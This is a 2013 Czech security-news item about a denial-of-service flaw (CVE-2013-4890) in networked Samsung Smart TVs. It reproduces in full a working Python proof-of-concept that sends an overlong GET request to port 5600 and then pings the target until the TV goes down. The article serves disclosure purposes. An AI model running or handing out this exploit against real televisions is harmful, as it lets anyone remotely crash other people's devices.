Zpět na seznam aktualit     Číst komentáře (1)     Verze pro tisk

Smart TV od Samsungu trpí DoS zranitelností

Autor: .cCuMiNn.   
24.7.2013

Máte-li svou televizi od Samsungu připojenou k síti, může se vám stát, že nedokoukáte svůj oblíbený film. Vzdáleně vám totiž televizor může restartovat zlomyslný útočník.


Tomu totiž stačí, aby znal IP adresu vašeho přijímače a odeslal na její TCP port 5600 speciální GET požadavek, který způsobí pád a následný restart systému.



Kód PoC exploitu
  1. #!/usr/bin/python
  2.  
  3. # Exploit Title: Samsung TV Denial of Service (DoS) Attack
  4. # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
  5. # Date: 07/21/2013
  6. # CVE Number: CVE-2013-4890
  7. # Vendor Homepage: http://www.samsung.com
  8. # Description:
  9. #   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
  10. #   As a results, the TV reboots...
  11. #   Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
  12.  
  13. import httplib
  14. import sys
  15. import os
  16.  
  17. print "  *****************************************"
  18. print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
  19. print "   Exploit: Denial of Service (DoS) attack\n"
  20. print "   Description:\n"
  21. print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
  22. print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
  23. print "  ****************************************\n"
  24.  
  25. # Sends the payload
  26. print "  Sending the malicious payload...\n"
  27. conn = httplib.HTTPConnection(sys.argv[1],5600)
  28. conn.request("GET", "A"*300)
  29. conn.close()
  30.  
  31. # Checks the response
  32. print "  Checking the status... (CTRL+Z to stop)\n"
  33. response = 0
  34. while response == 0:
  35.   response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  36.   if response != 0:
  37.     print "  Target down!\n"
Zdroj: http://thehackernews.com/2013/07/network-enabled-samsung-tvs…


Social Bookmarking

     





Hodnocení/Hlasovalo: 0/0

1  2  3  4  5    
(známkování jako ve škole)